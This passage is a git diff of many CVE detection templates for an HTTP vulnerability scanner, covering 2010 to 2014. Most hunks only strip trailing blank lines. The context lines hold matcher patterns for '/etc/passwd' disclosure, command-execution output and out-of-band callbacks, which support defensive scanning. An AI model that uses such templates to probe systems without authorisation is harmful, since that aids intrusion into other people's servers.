a/http/cves/2010/CVE-2010-2050.yaml +++ b/http/cves/2010/CVE-2010-2050.yaml @@ -35,5 +35,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2010/CVE-2010-2122.yaml b/http/cves/2010/CVE-2010-2122.yaml index c3e3166cf8..0ac90af4df 100644 --- a/http/cves/2010/CVE-2010-2122.yaml +++ b/http/cves/2010/CVE-2010-2122.yaml @@ -35,5 +35,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2010/CVE-2010-2128.yaml b/http/cves/2010/CVE-2010-2128.yaml index 708ff13a77..6bf86733f6 100644 --- a/http/cves/2010/CVE-2010-2128.yaml +++ b/http/cves/2010/CVE-2010-2128.yaml @@ -35,5 +35,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2010/CVE-2010-2259.yaml b/http/cves/2010/CVE-2010-2259.yaml index fc3cf5651d..b42c644237 100644 --- a/http/cves/2010/CVE-2010-2259.yaml +++ b/http/cves/2010/CVE-2010-2259.yaml @@ -35,5 +35,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2010/CVE-2010-2307.yaml b/http/cves/2010/CVE-2010-2307.yaml index f653f061f4..a604f1db68 100644 --- a/http/cves/2010/CVE-2010-2307.yaml +++ b/http/cves/2010/CVE-2010-2307.yaml @@ -34,5 +34,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2010/CVE-2010-2507.yaml b/http/cves/2010/CVE-2010-2507.yaml index 8490c947e0..d9aa1e6b52 100644 --- a/http/cves/2010/CVE-2010-2507.yaml +++ b/http/cves/2010/CVE-2010-2507.yaml @@ -35,5 +35,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2010/CVE-2010-2680.yaml b/http/cves/2010/CVE-2010-2680.yaml index 195de06c8c..becf360652 100644 --- a/http/cves/2010/CVE-2010-2680.yaml +++ b/http/cves/2010/CVE-2010-2680.yaml @@ -35,5 +35,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2010/CVE-2010-2682.yaml b/http/cves/2010/CVE-2010-2682.yaml index a848301a4c..6bfe799c9f 100644 --- a/http/cves/2010/CVE-2010-2682.yaml +++ b/http/cves/2010/CVE-2010-2682.yaml @@ -35,5 +35,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2010/CVE-2010-2857.yaml b/http/cves/2010/CVE-2010-2857.yaml index 828d8529a5..a51e09c9fc 100644 --- a/http/cves/2010/CVE-2010-2857.yaml +++ b/http/cves/2010/CVE-2010-2857.yaml @@ -35,5 +35,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2010/CVE-2010-2861.yaml b/http/cves/2010/CVE-2010-2861.yaml index ffeb95931d..14a3259e9b 100644 --- a/http/cves/2010/CVE-2010-2861.yaml +++ b/http/cves/2010/CVE-2010-2861.yaml @@ -38,5 +38,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2010/CVE-2010-2918.yaml b/http/cves/2010/CVE-2010-2918.yaml index 9abbcaab2a..d3bc05a979 100644 --- a/http/cves/2010/CVE-2010-2918.yaml +++ b/http/cves/2010/CVE-2010-2918.yaml @@ -35,5 +35,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2010/CVE-2010-2920.yaml b/http/cves/2010/CVE-2010-2920.yaml index 1c4c61c37b..0caf40d12b 100644 --- a/http/cves/2010/CVE-2010-2920.yaml +++ b/http/cves/2010/CVE-2010-2920.yaml @@ -34,5 +34,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2010/CVE-2010-3203.yaml b/http/cves/2010/CVE-2010-3203.yaml index 9a41a9b006..80114ae6c5 100644 --- a/http/cves/2010/CVE-2010-3203.yaml +++ b/http/cves/2010/CVE-2010-3203.yaml @@ -35,5 +35,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2010/CVE-2010-3426.yaml b/http/cves/2010/CVE-2010-3426.yaml index 7c105fe36d..be59db13bf 100644 --- a/http/cves/2010/CVE-2010-3426.yaml +++ b/http/cves/2010/CVE-2010-3426.yaml @@ -35,5 +35,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2010/CVE-2010-4231.yaml b/http/cves/2010/CVE-2010-4231.yaml index e94a007f7f..49f5c3e5e2 100644 --- a/http/cves/2010/CVE-2010-4231.yaml +++ b/http/cves/2010/CVE-2010-4231.yaml @@ -34,5 +34,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2010/CVE-2010-4239.yaml b/http/cves/2010/CVE-2010-4239.yaml index 7b7967a7b7..f9438ef1e2 100644 --- a/http/cves/2010/CVE-2010-4239.yaml +++ b/http/cves/2010/CVE-2010-4239.yaml @@ -34,5 +34,3 @@ http: - "fonts" - "extensions" condition: and - - diff --git a/http/cves/2010/CVE-2010-4282.yaml b/http/cves/2010/CVE-2010-4282.yaml index 1bcd226656..e946cde516 100644 --- a/http/cves/2010/CVE-2010-4282.yaml +++ b/http/cves/2010/CVE-2010-4282.yaml @@ -35,5 +35,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2010/CVE-2010-4617.yaml b/http/cves/2010/CVE-2010-4617.yaml index ce8346e990..0b88236096 100644 --- a/http/cves/2010/CVE-2010-4617.yaml +++ b/http/cves/2010/CVE-2010-4617.yaml @@ -34,5 +34,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2010/CVE-2010-4719.yaml b/http/cves/2010/CVE-2010-4719.yaml index d6346d8180..ecd2242147 100644 --- a/http/cves/2010/CVE-2010-4719.yaml +++ b/http/cves/2010/CVE-2010-4719.yaml @@ -35,5 +35,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2010/CVE-2010-4769.yaml b/http/cves/2010/CVE-2010-4769.yaml index a8d2a11955..f00094c66b 100644 --- a/http/cves/2010/CVE-2010-4769.yaml +++ b/http/cves/2010/CVE-2010-4769.yaml @@ -35,5 +35,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2010/CVE-2010-4977.yaml b/http/cves/2010/CVE-2010-4977.yaml index 9a948a1a33..58767bdbe9 100644 --- a/http/cves/2010/CVE-2010-4977.yaml +++ b/http/cves/2010/CVE-2010-4977.yaml @@ -35,5 +35,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2010/CVE-2010-5028.yaml b/http/cves/2010/CVE-2010-5028.yaml index 22e4cd369a..f57dd08a28 100644 --- a/http/cves/2010/CVE-2010-5028.yaml +++ b/http/cves/2010/CVE-2010-5028.yaml @@ -35,5 +35,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2010/CVE-2010-5278.yaml b/http/cves/2010/CVE-2010-5278.yaml index 3605c21b8e..0b0082cad2 100644 --- a/http/cves/2010/CVE-2010-5278.yaml +++ b/http/cves/2010/CVE-2010-5278.yaml @@ -36,5 +36,3 @@ http: - "extensions" condition: and part: body - - diff --git a/http/cves/2010/CVE-2010-5286.yaml b/http/cves/2010/CVE-2010-5286.yaml index 89a5da2340..1f730f8070 100644 --- a/http/cves/2010/CVE-2010-5286.yaml +++ b/http/cves/2010/CVE-2010-5286.yaml @@ -35,5 +35,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2011/CVE-2011-0049.yaml b/http/cves/2011/CVE-2011-0049.yaml index 0b5e2d68b9..48844d6d78 100644 --- a/http/cves/2011/CVE-2011-0049.yaml +++ b/http/cves/2011/CVE-2011-0049.yaml @@ -36,5 +36,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2011/CVE-2011-1669.yaml b/http/cves/2011/CVE-2011-1669.yaml index 94813e46e7..d632708f3b 100644 --- a/http/cves/2011/CVE-2011-1669.yaml +++ b/http/cves/2011/CVE-2011-1669.yaml @@ -36,5 +36,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2011/CVE-2011-2744.yaml b/http/cves/2011/CVE-2011-2744.yaml index 4497170651..5264b1a9a7 100644 --- a/http/cves/2011/CVE-2011-2744.yaml +++ b/http/cves/2011/CVE-2011-2744.yaml @@ -34,5 +34,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2011/CVE-2011-2780.yaml b/http/cves/2011/CVE-2011-2780.yaml index 795b315570..9f081fbff5 100644 --- a/http/cves/2011/CVE-2011-2780.yaml +++ b/http/cves/2011/CVE-2011-2780.yaml @@ -40,5 +40,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2011/CVE-2011-3315.yaml b/http/cves/2011/CVE-2011-3315.yaml index 96c1b59c76..3e42638914 100644 --- a/http/cves/2011/CVE-2011-3315.yaml +++ b/http/cves/2011/CVE-2011-3315.yaml @@ -34,5 +34,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2011/CVE-2011-4336.yaml b/http/cves/2011/CVE-2011-4336.yaml index f385048751..dfab657b6f 100644 --- a/http/cves/2011/CVE-2011-4336.yaml +++ b/http/cves/2011/CVE-2011-4336.yaml @@ -41,5 +41,3 @@ http: part: header words: - text/html - - diff --git a/http/cves/2011/CVE-2011-4618.yaml b/http/cves/2011/CVE-2011-4618.yaml index c5a05a2458..bd223433f3 100644 --- a/http/cves/2011/CVE-2011-4618.yaml +++ b/http/cves/2011/CVE-2011-4618.yaml @@ -40,5 +40,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2011/CVE-2011-4624.yaml b/http/cves/2011/CVE-2011-4624.yaml index 33b47d5fad..58a25b3bcc 100644 --- a/http/cves/2011/CVE-2011-4624.yaml +++ b/http/cves/2011/CVE-2011-4624.yaml @@ -40,5 +40,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2011/CVE-2011-4804.yaml b/http/cves/2011/CVE-2011-4804.yaml index 97322d27f1..f6f1ff279d 100644 --- a/http/cves/2011/CVE-2011-4804.yaml +++ b/http/cves/2011/CVE-2011-4804.yaml @@ -35,5 +35,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2011/CVE-2011-4926.yaml b/http/cves/2011/CVE-2011-4926.yaml index 7f8dd85e61..f9f43503e9 100644 --- a/http/cves/2011/CVE-2011-4926.yaml +++ b/http/cves/2011/CVE-2011-4926.yaml @@ -40,5 +40,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2011/CVE-2011-5106.yaml b/http/cves/2011/CVE-2011-5106.yaml index 907c361ceb..8e7caf2509 100644 --- a/http/cves/2011/CVE-2011-5106.yaml +++ b/http/cves/2011/CVE-2011-5106.yaml @@ -40,5 +40,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2011/CVE-2011-5107.yaml b/http/cves/2011/CVE-2011-5107.yaml index c132a5c887..5ffe67d47c 100644 --- a/http/cves/2011/CVE-2011-5107.yaml +++ b/http/cves/2011/CVE-2011-5107.yaml @@ -40,5 +40,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2011/CVE-2011-5179.yaml b/http/cves/2011/CVE-2011-5179.yaml index 63d8ceacb0..c7112352b5 100644 --- a/http/cves/2011/CVE-2011-5179.yaml +++ b/http/cves/2011/CVE-2011-5179.yaml @@ -40,5 +40,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2011/CVE-2011-5181.yaml b/http/cves/2011/CVE-2011-5181.yaml index c8e40c170a..d3b5022ce3 100644 --- a/http/cves/2011/CVE-2011-5181.yaml +++ b/http/cves/2011/CVE-2011-5181.yaml @@ -39,5 +39,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2011/CVE-2011-5265.yaml b/http/cves/2011/CVE-2011-5265.yaml index 1d35e689aa..f7d234f7bf 100644 --- a/http/cves/2011/CVE-2011-5265.yaml +++ b/http/cves/2011/CVE-2011-5265.yaml @@ -39,5 +39,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2012/CVE-2012-0392.yaml b/http/cves/2012/CVE-2012-0392.yaml index 9a1cf39053..afb5f2abae 100644 --- a/http/cves/2012/CVE-2012-0392.yaml +++ b/http/cves/2012/CVE-2012-0392.yaml @@ -35,5 +35,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2012/CVE-2012-0394.yaml b/http/cves/2012/CVE-2012-0394.yaml index 5df9cda0e8..28f3404635 100644 --- a/http/cves/2012/CVE-2012-0394.yaml +++ b/http/cves/2012/CVE-2012-0394.yaml @@ -42,5 +42,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2012/CVE-2012-0896.yaml b/http/cves/2012/CVE-2012-0896.yaml index 121fd7dfe4..44e466cf92 100644 --- a/http/cves/2012/CVE-2012-0896.yaml +++ b/http/cves/2012/CVE-2012-0896.yaml @@ -35,5 +35,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2012/CVE-2012-0901.yaml b/http/cves/2012/CVE-2012-0901.yaml index acf52e1c89..cd65bdcf20 100644 --- a/http/cves/2012/CVE-2012-0901.yaml +++ b/http/cves/2012/CVE-2012-0901.yaml @@ -39,5 +39,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2012/CVE-2012-0981.yaml b/http/cves/2012/CVE-2012-0981.yaml index 0b404234f0..a5333c715d 100644 --- a/http/cves/2012/CVE-2012-0981.yaml +++ b/http/cves/2012/CVE-2012-0981.yaml @@ -34,5 +34,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2012/CVE-2012-0991.yaml b/http/cves/2012/CVE-2012-0991.yaml index 8332fefc0d..d1dc8781fa 100644 --- a/http/cves/2012/CVE-2012-0991.yaml +++ b/http/cves/2012/CVE-2012-0991.yaml @@ -34,5 +34,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2012/CVE-2012-0996.yaml b/http/cves/2012/CVE-2012-0996.yaml index 32c3c240fb..28c249b600 100644 --- a/http/cves/2012/CVE-2012-0996.yaml +++ b/http/cves/2012/CVE-2012-0996.yaml @@ -34,5 +34,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2012/CVE-2012-1226.yaml b/http/cves/2012/CVE-2012-1226.yaml index 1b0577d44c..62aab8bb73 100644 --- a/http/cves/2012/CVE-2012-1226.yaml +++ b/http/cves/2012/CVE-2012-1226.yaml @@ -35,5 +35,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2012/CVE-2012-1835.yaml b/http/cves/2012/CVE-2012-1835.yaml index b3a487d97f..363202f83d 100644 --- a/http/cves/2012/CVE-2012-1835.yaml +++ b/http/cves/2012/CVE-2012-1835.yaml @@ -44,5 +44,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2012/CVE-2012-2371.yaml b/http/cves/2012/CVE-2012-2371.yaml index 1cc10d205f..1e684d4be4 100644 --- a/http/cves/2012/CVE-2012-2371.yaml +++ b/http/cves/2012/CVE-2012-2371.yaml @@ -39,5 +39,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2012/CVE-2012-3153.yaml b/http/cves/2012/CVE-2012-3153.yaml index 020bd8f4e3..b34d2bd37d 100644 --- a/http/cves/2012/CVE-2012-3153.yaml +++ b/http/cves/2012/CVE-2012-3153.yaml @@ -54,5 +54,3 @@ http: name: linux_working_path regex: - "/.*/showenv" - - diff --git a/http/cves/2012/CVE-2012-4242.yaml b/http/cves/2012/CVE-2012-4242.yaml index 458df02341..ef302db543 100644 --- a/http/cves/2012/CVE-2012-4242.yaml +++ b/http/cves/2012/CVE-2012-4242.yaml @@ -38,5 +38,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2012/CVE-2012-4253.yaml b/http/cves/2012/CVE-2012-4253.yaml index 41663dea2b..b0d038c2a2 100644 --- a/http/cves/2012/CVE-2012-4253.yaml +++ b/http/cves/2012/CVE-2012-4253.yaml @@ -34,5 +34,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2012/CVE-2012-4273.yaml b/http/cves/2012/CVE-2012-4273.yaml index 8c009400df..267808f18e 100644 --- a/http/cves/2012/CVE-2012-4273.yaml +++ b/http/cves/2012/CVE-2012-4273.yaml @@ -40,5 +40,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2012/CVE-2012-4547.yaml b/http/cves/2012/CVE-2012-4547.yaml index 020b0b810c..1f99310ae9 100644 --- a/http/cves/2012/CVE-2012-4547.yaml +++ b/http/cves/2012/CVE-2012-4547.yaml @@ -41,5 +41,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2012/CVE-2012-4768.yaml b/http/cves/2012/CVE-2012-4768.yaml index 0c1f8469e3..2c855ad445 100644 --- a/http/cves/2012/CVE-2012-4768.yaml +++ b/http/cves/2012/CVE-2012-4768.yaml @@ -38,5 +38,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2012/CVE-2012-4878.yaml b/http/cves/2012/CVE-2012-4878.yaml index dd2b439f79..bfb9f16f6e 100644 --- a/http/cves/2012/CVE-2012-4878.yaml +++ b/http/cves/2012/CVE-2012-4878.yaml @@ -34,5 +34,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2012/CVE-2012-4889.yaml b/http/cves/2012/CVE-2012-4889.yaml index cc02ec074d..48f4378b05 100644 --- a/http/cves/2012/CVE-2012-4889.yaml +++ b/http/cves/2012/CVE-2012-4889.yaml @@ -39,5 +39,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2012/CVE-2012-4940.yaml b/http/cves/2012/CVE-2012-4940.yaml index 8f4b40c110..4f32e1b451 100644 --- a/http/cves/2012/CVE-2012-4940.yaml +++ b/http/cves/2012/CVE-2012-4940.yaml @@ -34,5 +34,3 @@ http: - "fonts" - "extensions" condition: and - - diff --git a/http/cves/2012/CVE-2012-5913.yaml b/http/cves/2012/CVE-2012-5913.yaml index 99c03aa82a..e8d3c9c96b 100644 --- a/http/cves/2012/CVE-2012-5913.yaml +++ b/http/cves/2012/CVE-2012-5913.yaml @@ -39,5 +39,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2013/CVE-2013-1965.yaml b/http/cves/2013/CVE-2013-1965.yaml index 2c54f22371..53e1babe64 100644 --- a/http/cves/2013/CVE-2013-1965.yaml +++ b/http/cves/2013/CVE-2013-1965.yaml @@ -38,5 +38,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2013/CVE-2013-2248.yaml b/http/cves/2013/CVE-2013-2248.yaml index 237cdea2da..a77c398d2a 100644 --- a/http/cves/2013/CVE-2013-2248.yaml +++ b/http/cves/2013/CVE-2013-2248.yaml @@ -30,5 +30,3 @@ http: regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' part: header - - diff --git a/http/cves/2013/CVE-2013-2251.yaml b/http/cves/2013/CVE-2013-2251.yaml index a3293f4d45..85eb111bcd 100644 --- a/http/cves/2013/CVE-2013-2251.yaml +++ b/http/cves/2013/CVE-2013-2251.yaml @@ -54,5 +54,3 @@ http: part: body regex: - "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)" - - diff --git a/http/cves/2013/CVE-2013-2287.yaml b/http/cves/2013/CVE-2013-2287.yaml index 3487c18285..8288fe467f 100644 --- a/http/cves/2013/CVE-2013-2287.yaml +++ b/http/cves/2013/CVE-2013-2287.yaml @@ -38,5 +38,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2013/CVE-2013-3526.yaml b/http/cves/2013/CVE-2013-3526.yaml index 2a26edb9ab..ede67f8eb4 100644 --- a/http/cves/2013/CVE-2013-3526.yaml +++ b/http/cves/2013/CVE-2013-3526.yaml @@ -39,5 +39,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2013/CVE-2013-3827.yaml b/http/cves/2013/CVE-2013-3827.yaml index 3d0ac72485..afa402a23a 100644 --- a/http/cves/2013/CVE-2013-3827.yaml +++ b/http/cves/2013/CVE-2013-3827.yaml @@ -46,5 +46,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2013/CVE-2013-4117.yaml b/http/cves/2013/CVE-2013-4117.yaml index 9842b3ff36..3c237ea63a 100644 --- a/http/cves/2013/CVE-2013-4117.yaml +++ b/http/cves/2013/CVE-2013-4117.yaml @@ -39,5 +39,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2013/CVE-2013-4625.yaml b/http/cves/2013/CVE-2013-4625.yaml index 2a77929844..8ce8d38550 100644 --- a/http/cves/2013/CVE-2013-4625.yaml +++ b/http/cves/2013/CVE-2013-4625.yaml @@ -41,5 +41,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2013/CVE-2013-5528.yaml b/http/cves/2013/CVE-2013-5528.yaml index 0c1da048ef..9174141042 100644 --- a/http/cves/2013/CVE-2013-5528.yaml +++ b/http/cves/2013/CVE-2013-5528.yaml @@ -34,5 +34,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2013/CVE-2013-5979.yaml b/http/cves/2013/CVE-2013-5979.yaml index 239e830be5..3ba4a66f34 100644 --- a/http/cves/2013/CVE-2013-5979.yaml +++ b/http/cves/2013/CVE-2013-5979.yaml @@ -33,5 +33,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2013/CVE-2013-6281.yaml b/http/cves/2013/CVE-2013-6281.yaml index c5ae470ee4..ed991df906 100644 --- a/http/cves/2013/CVE-2013-6281.yaml +++ b/http/cves/2013/CVE-2013-6281.yaml @@ -46,5 +46,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2013/CVE-2013-7091.yaml b/http/cves/2013/CVE-2013-7091.yaml index 38a7d720e4..febdda4444 100644 --- a/http/cves/2013/CVE-2013-7091.yaml +++ b/http/cves/2013/CVE-2013-7091.yaml @@ -42,5 +42,3 @@ http: - type: regex regex: - "root=.*:0:0" - - diff --git a/http/cves/2013/CVE-2013-7240.yaml b/http/cves/2013/CVE-2013-7240.yaml index c4a107e772..2e99af565b 100644 --- a/http/cves/2013/CVE-2013-7240.yaml +++ b/http/cves/2013/CVE-2013-7240.yaml @@ -39,5 +39,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2013/CVE-2013-7285.yaml b/http/cves/2013/CVE-2013-7285.yaml index ad768a8040..7b515b8b66 100644 --- a/http/cves/2013/CVE-2013-7285.yaml +++ b/http/cves/2013/CVE-2013-7285.yaml @@ -57,4 +57,3 @@ http: part: interactsh_request words: - "User-Agent: curl" - diff --git a/http/cves/2014/CVE-2014-10037.yaml b/http/cves/2014/CVE-2014-10037.yaml index 132aa4a1cb..7d9ba4d2df 100644 --- a/http/cves/2014/CVE-2014-10037.yaml +++ b/http/cves/2014/CVE-2014-10037.yaml @@ -33,5 +33,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2014/CVE-2014-1203.yaml b/http/cves/2014/CVE-2014-1203.yaml index 1f21d85272..345113c27a 100644 --- a/http/cves/2014/CVE-2014-1203.yaml +++ b/http/cves/2014/CVE-2014-1203.yaml @@ -39,5 +39,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2014/CVE-2014-2321.yaml b/http/cves/2014/CVE-2014-2321.yaml index dc698ee231..17804f4e58 100644 --- a/http/cves/2014/CVE-2014-2321.yaml +++ b/http/cves/2014/CVE-2014-2321.yaml @@ -37,5 +37,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2014/CVE-2014-2323.yaml b/http/cves/2014/CVE-2014-2323.yaml index 4886723676..54d5c2eb08 100644 --- a/http/cves/2014/CVE-2014-2323.yaml +++ b/http/cves/2014/CVE-2014-2323.yaml @@ -31,5 +31,3 @@ http: - type: regex regex: - "root:[x*]:0:0:" - - diff --git a/http/cves/2014/CVE-2014-2383.yaml b/http/cves/2014/CVE-2014-2383.yaml index 0202cb8a53..7119fedfae 100644 --- a/http/cves/2014/CVE-2014-2383.yaml +++ b/http/cves/2014/CVE-2014-2383.yaml @@ -54,5 +54,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2014/CVE-2014-2908.yaml b/http/cves/2014/CVE-2014-2908.yaml index e7b53fb83c..2e188fe5d5 100644 --- a/http/cves/2014/CVE-2014-2908.yaml +++ b/http/cves/2014/CVE-2014-2908.yaml @@ -40,5 +40,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2014/CVE-2014-2962.yaml b/http/cves/2014/CVE-2014-2962.yaml index ce93609454..054830da05 100644 --- a/http/cves/2014/CVE-2014-2962.yaml +++ b/http/cves/2014/CVE-2014-2962.yaml @@ -35,5 +35,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2014/CVE-2014-3120.yaml b/http/cves/2014/CVE-2014-3120.yaml index b287826108..f253d982d2 100644 --- a/http/cves/2014/CVE-2014-3120.yaml +++ b/http/cves/2014/CVE-2014-3120.yaml @@ -61,5 +61,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2014/CVE-2014-3206.yaml b/http/cves/2014/CVE-2014-3206.yaml index 093fc71fa7..211404160b 100644 --- a/http/cves/2014/CVE-2014-3206.yaml +++ b/http/cves/2014/CVE-2014-3206.yaml @@ -36,5 +36,3 @@ http: part: interactsh_protocol words: - "http" - - diff --git a/http/cves/2014/CVE-2014-3704.yaml b/http/cves/2014/CVE-2014-3704.yaml index 985d38674c..022f1df1f7 100644 --- a/http/cves/2014/CVE-2014-3704.yaml +++ b/http/cves/2014/CVE-2014-3704.yaml @@ -45,5 +45,3 @@ http: - type: status status: - 500 - - diff --git a/http/cves/2014/CVE-2014-3744.yaml b/http/cves/2014/CVE-2014-3744.yaml index 9b7732995a..1cfa729b6f 100644 --- a/http/cves/2014/CVE-2014-3744.yaml +++ b/http/cves/2014/CVE-2014-3744.yaml @@ -32,5 +32,3 @@ http: - type: regex regex: - "root:.*:0:0:" - - diff --git a/http/cves/2014/CVE-2014-4210.yaml b/http/cves/2014/CVE-2014-4210.yaml index f95b129be6..96b1feb895 100644 --- a/http/cves/2014/CVE-2014-4210.yaml +++ b/http/cves/2014/CVE-2014-4210.yaml @@ -34,5 +34,3 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" - - diff --git a/http/cves/2014/CVE-2014-4513.yaml b/http/cves/2014/CVE-2014-4513.yaml index 0198340a24..7ff7ff7aec 100644 --- a/http/cves/2014/CVE-2014-4513.yaml +++ b/http/cves/2014/CVE-2014-4513.yaml @@ -38,5 +38,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2014/CVE-2014-4535.yaml b/http/cves/2014/CVE-2014-4535.yaml index 4d0be79d3d..50a4248536 100644 --- a/http/cves/2014/CVE-2014-4535.yaml +++ b/http/cves/2014/CVE-2014-4535.yaml @@ -40,5 +40,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2014/CVE-2014-4536.yaml b/http/cves/2014/CVE-2014-4536.yaml index f28805090d..f021007756 100644 --- a/http/cves/2014/CVE-2014-4536.yaml +++ b/http/cves/2014/CVE-2014-4536.yaml @@ -42,5 +42,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2014/CVE-2014-4539.yaml b/http/cves/2014/CVE-2014-4539.yaml index f0a2f1c098..14399a497b 100644 --- a/http/cves/2014/CVE-2014-4539.yaml +++ b/http/cves/2014/CVE-2014-4539.yaml @@ -40,5 +40,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2014/CVE-2014-4544.yaml b/http/cves/2014/CVE-2014-4544.yaml index 52925b88b6..8123dd1a22 100644 --- a/http/cves/2014/CVE-2014-4544.yaml +++ b/http/cves/2014/CVE-2014-4544.yaml @@ -40,5 +40,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2014/CVE-2014-4550.yaml b/http/cves/2014/CVE-2014-4550.yaml index 1616b5f921..171354f1e5 100644 --- a/http/cves/2014/CVE-2014-4550.yaml +++ b/http/cves/2014/CVE-2014-4550.yaml @@ -41,5 +41,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2014/CVE-2014-4558.yaml b/http/cves/2014/CVE-2014-4558.yaml index baab0f8a38..f7dd5da187 100644 --- a/http/cves/2014/CVE-2014-4558.yaml +++ b/http/cves/2014/CVE-2014-4558.yaml @@ -40,5 +40,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2014/CVE-2014-4561.yaml b/http/cves/2014/CVE-2014-4561.yaml index 581b882a23..1040f59352 100644 --- a/http/cves/2014/CVE-2014-4561.yaml +++ b/http/cves/2014/CVE-2014-4561.yaml @@ -40,5 +40,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2014/CVE-2014-4592.yaml b/http/cves/2014/CVE-2014-4592.yaml index 4f3be0b863..f4144e1d81 100644 --- a/http/cves/2014/CVE-2014-4592.yaml +++ b/http/cves/2014/CVE-2014-4592.yaml @@ -41,5 +41,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2014/CVE-2014-4940.yaml b/http/cves/2014/CVE-2014-4940.yaml index 991fbbcfee..65a425a42f 100644 --- a/http/cves/2014/CVE-2014-4940.yaml +++ b/http/cves/2014/CVE-2014-4940.yaml @@ -34,5 +34,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2014/CVE-2014-4942.yaml b/http/cves/2014/CVE-2014-4942.yaml index a9f1d250ab..081b56d92c 100644 --- a/http/cves/2014/CVE-2014-4942.yaml +++ b/http/cves/2014/CVE-2014-4942.yaml @@ -43,5 +43,3 @@ http: group: 1 regex: - '>PHP Version <\/td>([0-9.]+)' - - diff --git a/http/cves/2014/CVE-2014-5111.yaml b/http/cves/2014/CVE-2014-5111.yaml index 591d931e90..47e4da4d08 100644 --- a/http/cves/2014/CVE-2014-5111.yaml +++ b/http/cves/2014/CVE-2014-5111.yaml @@ -33,5 +33,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2014/CVE-2014-5258.yaml b/http/cves/2014/CVE-2014-5258.yaml index 7e89135ca2..22337b5976 100644 --- a/http/cves/2014/CVE-2014-5258.yaml +++ b/http/cves/2014/CVE-2014-5258.yaml @@ -34,5 +34,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2014/CVE-2014-5368.yaml b/http/cves/2014/CVE-2014-5368.yaml index 62059c7893..3af899c0e6 100644 --- 